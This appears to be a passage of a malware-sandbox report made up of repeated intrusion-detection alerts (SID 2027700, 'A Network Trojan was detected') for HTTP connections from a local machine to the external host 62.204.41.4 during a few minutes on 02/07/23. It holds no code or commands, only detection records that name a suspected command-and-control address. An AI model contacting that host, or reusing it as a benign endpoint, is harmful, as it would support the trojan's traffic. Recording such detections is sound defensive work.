                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450207802027700 02/07/23-20:03:09.251394
                          SID:2027700
                          Source Port:50207
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450432802027700 02/07/23-20:04:06.987943
                          SID:2027700
                          Source Port:50432
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450390802027700 02/07/23-20:03:56.676042
                          SID:2027700
                          Source Port:50390
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450174802027700 02/07/23-20:03:01.410759
                          SID:2027700
                          Source Port:50174
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450367802027700 02/07/23-20:03:51.006859
                          SID:2027700
                          Source Port:50367
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449748802027700 02/07/23-20:00:58.128864
                          SID:2027700
                          Source Port:49748
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450015802027700 02/07/23-20:02:14.676485
                          SID:2027700
                          Source Port:50015
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450113802027700 02/07/23-20:02:43.134587
                          SID:2027700
                          Source Port:50113
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450269802027700 02/07/23-20:03:26.932435
                          SID:2027700
                          Source Port:50269
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450263802027700 02/07/23-20:03:25.380080
                          SID:2027700
                          Source Port:50263
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450272802027700 02/07/23-20:03:27.657286
                          SID:2027700
                          Source Port:50272
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450370802027700 02/07/23-20:03:51.805979
                          SID:2027700
                          Source Port:50370
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450361802027700 02/07/23-20:03:49.565590
                          SID:2027700
                          Source Port:50361
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449739802027700 02/07/23-20:00:55.935980
                          SID:2027700
                          Source Port:49739
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450006802027700 02/07/23-20:02:12.401268
                          SID:2027700
                          Source Port:50006
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450358802027700 02/07/23-20:03:48.800828
                          SID:2027700
                          Source Port:50358
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449837802027700 02/07/23-20:01:21.459260
                          SID:2027700
                          Source Port:49837
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450202802027700 02/07/23-20:03:08.029585
                          SID:2027700
                          Source Port:50202
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450456802027700 02/07/23-20:04:12.818077
                          SID:2027700
                          Source Port:50456
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450104802027700 02/07/23-20:02:40.952138
                          SID:2027700
                          Source Port:50104
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449809802027700 02/07/23-20:01:14.874634
                          SID:2027700
                          Source Port:49809
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450333802027700 02/07/23-20:03:42.674478
                          SID:2027700
                          Source Port:50333
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450235802027700 02/07/23-20:03:16.065619
                          SID:2027700
                          Source Port:50235
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450431802027700 02/07/23-20:04:06.742108
                          SID:2027700
                          Source Port:50431
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449910802027700 02/07/23-20:01:41.844449
                          SID:2027700
                          Source Port:49910
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449977802027700 02/07/23-20:02:01.710756
                          SID:2027700
                          Source Port:49977
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449723802027700 02/07/23-20:00:52.073819
                          SID:2027700
                          Source Port:49723
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449879802027700 02/07/23-20:01:34.335804
                          SID:2027700
                          Source Port:49879
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449821802027700 02/07/23-20:01:17.548025
                          SID:2027700
                          Source Port:49821
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449812802027700 02/07/23-20:01:15.578134
                          SID:2027700
                          Source Port:49812
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449968802027700 02/07/23-20:01:59.735492
                          SID:2027700
                          Source Port:49968
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449770802027700 02/07/23-20:01:03.285971
                          SID:2027700
                          Source Port:49770
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449767802027700 02/07/23-20:01:02.575091
                          SID:2027700
                          Source Port:49767
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449882802027700 02/07/23-20:01:34.875626
                          SID:2027700
                          Source Port:49882
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450440802027700 02/07/23-20:04:08.934141
                          SID:2027700
                          Source Port:50440
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450291802027700 02/07/23-20:03:32.300203
                          SID:2027700
                          Source Port:50291
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449971802027700 02/07/23-20:02:00.459434
                          SID:2027700
                          Source Port:49971
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450244802027700 02/07/23-20:03:18.251405
                          SID:2027700
                          Source Port:50244
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450429802027700 02/07/23-20:04:06.205613
                          SID:2027700
                          Source Port:50429
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450339802027700 02/07/23-20:03:44.150750
                          SID:2027700
                          Source Port:50339
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450043802027700 02/07/23-20:02:21.535774
                          SID:2027700
                          Source Port:50043
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450297802027700 02/07/23-20:03:33.829768
                          SID:2027700
                          Source Port:50297
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450132802027700 02/07/23-20:02:51.157888
                          SID:2027700
                          Source Port:50132
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450173802027700 02/07/23-20:03:01.155358
                          SID:2027700
                          Source Port:50173
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450386802027700 02/07/23-20:03:55.723368
                          SID:2027700
                          Source Port:50386
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450216802027700 02/07/23-20:03:11.470014
                          SID:2027700
                          Source Port:50216
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450428802027700 02/07/23-20:04:05.975695
                          SID:2027700
                          Source Port:50428
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450084802027700 02/07/23-20:02:35.626446
                          SID:2027700
                          Source Port:50084
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449952802027700 02/07/23-20:01:55.791186
                          SID:2027700
                          Source Port:49952
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450412802027700 02/07/23-20:04:02.064925
                          SID:2027700
                          Source Port:50412
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449911802027700 02/07/23-20:01:42.093950
                          SID:2027700
                          Source Port:49911
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450305802027700 02/07/23-20:03:35.785500
                          SID:2027700
                          Source Port:50305
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449751802027700 02/07/23-20:00:58.872163
                          SID:2027700
                          Source Port:49751
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449840802027700 02/07/23-20:01:22.187785
                          SID:2027700
                          Source Port:49840
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449898802027700 02/07/23-20:01:38.811965
                          SID:2027700
                          Source Port:49898
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450399802027700 02/07/23-20:03:58.878195
                          SID:2027700
                          Source Port:50399
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450047802027700 02/07/23-20:02:22.518279
                          SID:2027700
                          Source Port:50047
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450145802027700 02/07/23-20:02:54.357855
                          SID:2027700
                          Source Port:50145
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450231802027700 02/07/23-20:03:15.107613
                          SID:2027700
                          Source Port:50231
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450056802027700 02/07/23-20:02:24.870217
                          SID:2027700
                          Source Port:50056
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450228802027700 02/07/23-20:03:14.349981
                          SID:2027700
                          Source Port:50228
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450062802027700 02/07/23-20:02:28.090658
                          SID:2027700
                          Source Port:50062
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450317802027700 02/07/23-20:03:38.748560
                          SID:2027700
                          Source Port:50317
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450219802027700 02/07/23-20:03:12.179097
                          SID:2027700
                          Source Port:50219
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449838802027700 02/07/23-20:01:21.703798
                          SID:2027700
                          Source Port:49838
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450457802027700 02/07/23-20:04:13.065112
                          SID:2027700
                          Source Port:50457
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449936802027700 02/07/23-20:01:51.820246
                          SID:2027700
                          Source Port:49936
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450301802027700 02/07/23-20:03:34.801016
                          SID:2027700
                          Source Port:50301
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450203802027700 02/07/23-20:03:08.264782
                          SID:2027700
                          Source Port:50203
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449853802027700 02/07/23-20:01:25.706873
                          SID:2027700
                          Source Port:49853
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449894802027700 02/07/23-20:01:37.843818
                          SID:2027700
                          Source Port:49894
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449755802027700 02/07/23-20:00:59.855021
                          SID:2027700
                          Source Port:49755
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449927802027700 02/07/23-20:01:49.659609
                          SID:2027700
                          Source Port:49927
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450288802027700 02/07/23-20:03:31.578001
                          SID:2027700
                          Source Port:50288
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450158802027700 02/07/23-20:02:57.529246
                          SID:2027700
                          Source Port:50158
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450383802027700 02/07/23-20:03:54.971539
                          SID:2027700
                          Source Port:50383
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449764802027700 02/07/23-20:01:01.795053
                          SID:2027700
                          Source Port:49764
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450028802027700 02/07/23-20:02:17.895696
                          SID:2027700
                          Source Port:50028
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450342802027700 02/07/23-20:03:44.892172
                          SID:2027700
                          Source Port:50342
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449980802027700 02/07/23-20:02:02.464633
                          SID:2027700
                          Source Port:49980
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450472802027700 02/07/23-20:04:16.721903
                          SID:2027700
                          Source Port:50472
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450075802027700 02/07/23-20:02:33.175281
                          SID:2027700
                          Source Port:50075
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450117802027700 02/07/23-20:02:44.156964
                          SID:2027700
                          Source Port:50117
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450199802027700 02/07/23-20:03:07.326755
                          SID:2027700
                          Source Port:50199
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450034802027700 02/07/23-20:02:19.362339
                          SID:2027700
                          Source Port:50034
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450247802027700 02/07/23-20:03:18.979917
                          SID:2027700
                          Source Port:50247
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450314802027700 02/07/23-20:03:38.017064
                          SID:2027700
                          Source Port:50314
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449949802027700 02/07/23-20:01:55.074452
                          SID:2027700
                          Source Port:49949
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450444802027700 02/07/23-20:04:09.894977
                          SID:2027700
                          Source Port:50444
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450403802027700 02/07/23-20:03:59.851322
                          SID:2027700
                          Source Port:50403
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449908802027700 02/07/23-20:01:41.349767
                          SID:2027700
                          Source Port:49908
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449866802027700 02/07/23-20:01:31.109835
                          SID:2027700
                          Source Port:49866
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450320802027700 02/07/23-20:03:39.480009
                          SID:2027700
                          Source Port:50320
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449736802027700 02/07/23-20:00:55.230834
                          SID:2027700
                          Source Port:49736
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449783802027700 02/07/23-20:01:06.638994
                          SID:2027700
                          Source Port:49783
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449996802027700 02/07/23-20:02:09.912452
                          SID:2027700
                          Source Port:49996
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449825802027700 02/07/23-20:01:18.559732
                          SID:2027700
                          Source Port:49825
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449742802027700 02/07/23-20:00:56.667263
                          SID:2027700
                          Source Port:49742
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449955802027700 02/07/23-20:01:56.500323
                          SID:2027700
                          Source Port:49955
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450018802027700 02/07/23-20:02:15.452445
                          SID:2027700
                          Source Port:50018
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450309802027700 02/07/23-20:03:36.772736
                          SID:2027700
                          Source Port:50309
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449947802027700 02/07/23-20:01:54.584701
                          SID:2027700
                          Source Port:49947
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450082802027700 02/07/23-20:02:34.890335
                          SID:2027700
                          Source Port:50082
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450214802027700 02/07/23-20:03:10.972258
                          SID:2027700
                          Source Port:50214
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449993802027700 02/07/23-20:02:07.121549
                          SID:2027700
                          Source Port:49993
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450355802027700 02/07/23-20:03:48.094654
                          SID:2027700
                          Source Port:50355
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450471802027700 02/07/23-20:04:16.488079
                          SID:2027700
                          Source Port:50471
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449852802027700 02/07/23-20:01:25.383304
                          SID:2027700
                          Source Port:49852
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450003802027700 02/07/23-20:02:11.648732
                          SID:2027700
                          Source Port:50003
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450453802027700 02/07/23-20:04:12.107650
                          SID:2027700
                          Source Port:50453
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449929802027700 02/07/23-20:01:50.134882
                          SID:2027700
                          Source Port:49929
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450177802027700 02/07/23-20:03:02.166311
                          SID:2027700
                          Source Port:50177
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450275802027700 02/07/23-20:03:28.403496
                          SID:2027700
                          Source Port:50275
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449965802027700 02/07/23-20:01:59.016140
                          SID:2027700
                          Source Port:49965
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450293802027700 02/07/23-20:03:32.801081
                          SID:2027700
                          Source Port:50293
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450327802027700 02/07/23-20:03:41.188880
                          SID:2027700
                          Source Port:50327
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449806802027700 02/07/23-20:01:14.154494
                          SID:2027700
                          Source Port:49806
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450425802027700 02/07/23-20:04:05.253501
                          SID:2027700
                          Source Port:50425
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450097802027700 02/07/23-20:02:39.099671
                          SID:2027700
                          Source Port:50097
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449769802027700 02/07/23-20:01:03.043961
                          SID:2027700
                          Source Port:49769
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450410802027700 02/07/23-20:04:01.580414
                          SID:2027700
                          Source Port:50410
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450054802027700 02/07/23-20:02:24.270996
                          SID:2027700
                          Source Port:50054
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449787802027700 02/07/23-20:01:09.515244
                          SID:2027700
                          Source Port:49787
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450388802027700 02/07/23-20:03:56.189946
                          SID:2027700
                          Source Port:50388
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450036802027700 02/07/23-20:02:19.847586
                          SID:2027700
                          Source Port:50036
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450092802027700 02/07/23-20:02:37.868052
                          SID:2027700
                          Source Port:50092
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450232802027700 02/07/23-20:03:15.344051
                          SID:2027700
                          Source Port:50232
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449957802027700 02/07/23-20:01:56.989416
                          SID:2027700
                          Source Port:49957
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450031802027700 02/07/23-20:02:18.637614
                          SID:2027700
                          Source Port:50031
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450250802027700 02/07/23-20:03:19.754500
                          SID:2027700
                          Source Port:50250
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449862802027700 02/07/23-20:01:30.125467
                          SID:2027700
                          Source Port:49862
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450481802027700 02/07/23-20:04:18.893120
                          SID:2027700
                          Source Port:50481
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450072802027700 02/07/23-20:02:32.475919
                          SID:2027700
                          Source Port:50072
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449779802027700 02/07/23-20:01:05.232360
                          SID:2027700
                          Source Port:49779
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449870802027700 02/07/23-20:01:32.078335
                          SID:2027700
                          Source Port:49870
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449998802027700 02/07/23-20:02:10.416841
                          SID:2027700
                          Source Port:49998
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450108802027700 02/07/23-20:02:41.932133
                          SID:2027700
                          Source Port:50108
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450149802027700 02/07/23-20:02:55.389818
                          SID:2027700
                          Source Port:50149
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450026802027700 02/07/23-20:02:17.408058
                          SID:2027700
                          Source Port:50026
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449975802027700 02/07/23-20:02:01.204512
                          SID:2027700
                          Source Port:49975
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450222802027700 02/07/23-20:03:12.933465
                          SID:2027700
                          Source Port:50222
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449797802027700 02/07/23-20:01:12.000477
                          SID:2027700
                          Source Port:49797
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450204802027700 02/07/23-20:03:08.498529
                          SID:2027700
                          Source Port:50204
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450398802027700 02/07/23-20:03:58.636270
                          SID:2027700
                          Source Port:50398
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449834802027700 02/07/23-20:01:20.722458
                          SID:2027700
                          Source Port:49834
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450400802027700 02/07/23-20:03:59.133077
                          SID:2027700
                          Source Port:50400
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450008802027700 02/07/23-20:02:12.917280
                          SID:2027700
                          Source Port:50008
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449811802027700 02/07/23-20:01:15.342261
                          SID:2027700
                          Source Port:49811
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450044802027700 02/07/23-20:02:21.772716
                          SID:2027700
                          Source Port:50044
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450393802027700 02/07/23-20:03:57.421090
                          SID:2027700
                          Source Port:50393
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450041802027700 02/07/23-20:02:21.067703
                          SID:2027700
                          Source Port:50041
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
